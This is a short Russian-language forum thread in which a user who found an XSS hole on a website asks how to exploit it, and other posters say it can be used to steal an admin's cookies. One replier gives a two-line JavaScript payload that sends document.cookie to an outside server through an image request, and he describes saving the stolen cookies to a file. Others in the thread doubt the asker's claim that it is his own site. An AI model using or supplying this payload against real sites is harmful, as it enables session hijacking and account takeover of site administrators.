Привет всем....в общем нашёл я на одном сайте xss уязвимость....при помощи вставки кода в поле xss заработало...но вот мучает вопрос как внедрить код с помощью это xss или как например изменить что-то в бд с помощью xss?
Изменить никак, можешь только угнать куки у админа.
Добавлено 11.03.16 в 14:53:25:
Но не факт, что у них однаковые куки для фронт и бекэнда
я просто свой сайт тестию)))
Rakovskiy, можешь по точнее сказать как угнать куки админа?
А какая разница что ты тестишь? На слово поверить?
Реально, сейчас послушаю где находится уязвимость, и пойду хакну 
Ты лучше в лоток срать научись. Более пригодится.
XaKeRoK,
var img=new Image();
img.src="http://site.ru/xss.jpg?"+ encodeURI(document.cookie);
Запрос получаешь и сохраняешь куки в текстовый файл на сервере.
PHP код не дам, т.к я и так почти нарушил правила, это не хак форум.
